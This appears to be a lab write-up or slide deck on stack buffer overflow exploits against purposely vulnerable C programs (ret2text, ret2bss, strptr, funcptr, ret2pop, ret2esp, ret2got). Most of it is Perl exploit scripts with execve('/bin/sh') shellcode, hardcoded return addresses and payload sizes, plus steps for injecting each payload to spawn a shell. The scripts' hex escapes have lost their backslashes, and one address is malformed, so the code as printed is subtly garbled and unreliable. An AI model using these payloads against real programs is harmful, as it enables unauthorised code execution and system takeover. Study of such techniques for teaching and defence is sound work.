The document discusses various buffer overflow exploits in C programming, detailing multiple exploit scripts. Each script demonstrates how to manipulate program memory to execute unauthorized code, including spawning shells and redirecting function pointers. It provides specific addresses, payload structures, and steps for generating and injecting the necessary payloads to achieve execution control.

1. ret2text.c
• Here the exploit is executed by overflowing the buffer, corrupting the old ebp value and replacing the
return address by the address of secret function.
• This exploit allows to execute secret function even though guid is not equal to “0”.
• EXPLOIT SCRIPT:
• #!/usr/bin/perl
# This address must match the address of secret function in the victim's program */
my $retaddr = "x96x84x04x08"; #0x8048496
# Fill NOP instruction
my $pad = "x90" x 24; #overwriting buffer and EBP
# Input string to our victim's program
my $arg = $pad.$retaddr;
# Let us store the input string to a file
open OUT, "> payload_ret2text";
print OUT $arg;
close OUT;

2. • EVIDENCE SCREENSHOT:
• The address of the secret function
is obtained.
• Observe the stack frame of the
public function to check the buffer
size allocated.
• Prepare a payload using the script
as shown in the previous page.
• The payload must be 24 bytes of
NOP + 4 bytes to overwrite return
address.
• Inject the payload and the function
prints “secret”.

3. ret2bss.c
• This exploit makes use of the address of the global buffer since it does not change.
• You need not worry about the local buffer size and address
• EXPLOIT SCRIPT:
• my $shellcode =
"x31xc0". # xorl %eax, %eax
"x50". # pushl %eax
"x68x6ex2fx73x68". # pushl $0x68732f6e
"x68x2fx2fx62x69". # pushl $0x69622f2f
"x89xe3" . # movl %esp, %ebx
"x99". # cltd
"x52". # pushl %edx
"x53". # pushl %ebx
"x89xe1". # movl %esp, %ecx
"xb0x0b" . # movb $0xb, %al
"xcdx80" # int $0x80
;
# This address must match the global buffer variable of the victim's program */
my $retaddr = "x40xa0x04x08"; #0x804a040
# Fill NOP instruction
my $pad = "x90" x 244;
# Input string to our victim's program
my $arg = $shellcode.$pad.$retaddr;
# Let us store the input string to a file
open OUT, "> payload_bss";
print OUT $arg;
close OUT;

4. EVIDENCE SCREENSHOT:
• Observe the stack frame of the
method function to check the
buffer size allocated.
• Prepare a payload to overwrite
the return address by the
address of the global buffer
• The payload must be of 272
bytes: 24 bytes shellcode + 244
bytes padding + 4 bytes return
address.
• Inject the payload and the shell
code gets executed, spawning
the shell.

5. strptr.c
• This exploit redirects the pointers to spawn a shell.
• Makes use of the vulnerable function strptr.
• Exploit Script:
• # this address must be the address of license pointer
my $licenseaddr = "x82x85x04x08x82x85x04x08"; #two times because you have to over the conf ptr address by license
ptr.
# Fill NOP instruction
my $pad = "x90" x 256;
# Input string to our victim's program
my $arg = $pad.$licenseaddr;
# Let us store the input string to a file
open OUT, "> payload_strptr";
print OUT $arg;
close OUT;

6. EVIDENCE SCREENSHOT:
• Disassemble main to find out the
address of the license and conf
pointers.
• Create a file with name “THIS”
and then add the following: echo
“you have been hahcked by
me…..”
/bin/sh
• Generate a payload of 264 bytes:
to overwrite conf ptr by license
ptr.
• Inject the payload, when the
control is transferred to system
function, the file “THIS” will be
executed and the shell will be
spawned.

7. funcptr.c
• This exploit redirects the function pointers to spawn a shell.
• Makes use of the vulnerable function strptr.
• Exploit script:
• # this address must be the address of system instruction
my $systemaddr = "x40x83x04x08";
# Fill NOP instruction
my $pad = "x90" x 64;
# Input string to our victim's program
my $arg = $pad.$systemaddr;
# Let us store the input string to a file
open OUT, "> payload_funcptr";
print OUT $arg;
close OUT;

8. EVIDENCE SCREENSHOT:
• Disassemble the function
method to know the address of
the system instruction.
• Generate a payload by using the
script as show in the previous
slide.
• The payload must of 68 bytes:
64 bytes NOP + 4 bytes of
system instruction address.
• Inject the payload as the first
input and the ‘/bin/sh’ as the
second input.
• The system instruction executes
/bin/sh and the shell is
spawned.

9. ret2pop.c
• This exploit makes use of the vulnerable function strcpy.
• EXPLOIT SCRIPT:
• my $shellcode =
"x31xc0". # xorl %eax, %eax
"x50". # pushl %eax
"x68x6ex2fx73x68". # pushl $0x68732f6e
"x68x2fx2fx62x69". # pushl $0x69622f2f
"x89xe3" . # movl %esp, %ebx
"x99". # cltd
"x52". # pushl %edx
"x53". # pushl %ebx
"x89xe1". # movl %esp, %ecx
"xb0x0b" . # movb $0xb, %al
"xcdx80" # int $0x80
;
# This address must match the address of the pop and ret instruction sequence
my $retaddr = "xcbx84x04x8"; #80484cb
# Fill NOP instruction
my $pad = "x90" x 244;
# Input string to our victim's program
my $arg = $pad.$shellcode.$retaddr;
# Let us store the input string to a file
open OUT, "> payload_ret2pop";
print OUT $arg;
close OUT;

10. EVIDENCE SCREENSHOT:
• Disassemble the function
method to obtain the buffer size
and observe the stack frame.
• Using objdum –d obtain the
address of the pop and ret
instructions.
• Prepare a payload using the
script shown in the previous
slide.
• Payload must be 272 bytes: 244
bytes pad + 24 bytes shellcode +
4 bytes ret address.
• Inject the payload and the shell
is spawned as shown in the
figure.

11. ret2esp.c
• This exploit makes use of the jmp *esp instruction to control the flow of execution.
• It is done by determining the address of 58623 and hence the address of jmp *esp instruction.
• EXPLOIT SCRIPT:
• my $shellcode =
"x31xc0". # xorl %eax, %eax
"x50". # pushl %eax
"x68x6ex2fx73x68". # pushl $0x68732f6e
"x68x2fx2fx62x69". # pushl $0x69622f2f
"x89xe3" . # movl %esp, %ebx
"x99". # cltd
"x52". # pushl %edx
"x53". # pushl %ebx
"x89xe1". # movl %esp, %ecx
"xb0x0b" . # movb $0xb, %al
"xcdx80" # int $0x80
;
# This address must match the address where jmp *%esp or ff e4 instruction is stored
my $retaddr = "x42x84x04x08"; #8048424
# Fill NOP instruction
my $pad = "x90" x 268; # times because I need 16 bytes to hit the return address. 9+7 = 16.
# Input string to our victim's program
my $arg = $pad.$retaddr.$shellcode;
# Let us store the input string to a file
open OUT, "> payload_ret2esp";
print OUT $arg;
close OUT;

12. EVIDENCE SCREENSHOT:
• Disassemble the main program
and obtain the address of “ff e4”.
• Disassemble the function method
to observe the stack structure and
obtain the size of the buffer.
• Generate a payload using the
script as shown in the previous
slide.
• Payload = 268 bytes Pad + 4 bytes
ret address + 24 bytes shellcode.
• Inject the payload and the shell is
spawned as shown in the figure.

13. ret2got.c
• In this exploit the first strcpy instruction is used to overflow the buffer array and overwrite ptr by
printf GOT reference.
• This is accomplished by using the second strcpy and overwriting GOT entry of printf.
• EXPLOIT SCRIPT:
• ./ret2got `perl -e 'print "A"x8 . "x0cxa0x04x08"'` `perl -e 'print "x46x83x04x08“’`
• Entry for printf is 0x804a00c
• Dynamic linker address for system is 0x08048346

14. EVIDENCE SCREENSHOT:
• Disassemble main and obtain the
relevant entry point for ptintf i.e.
0x804a00c
• Disassemble anyfunction to obtain
the address where dynamic linker
call of the system happens i.e.
0x08048346
• The payload must have 8 bytes
followed by 4 bytes address of
printf and 4 bytes address where
system call happens.
• Create a file called array and add
the following instruction: /bin/sh
• Inject the payload and the shell is
spawned as shown in the figure.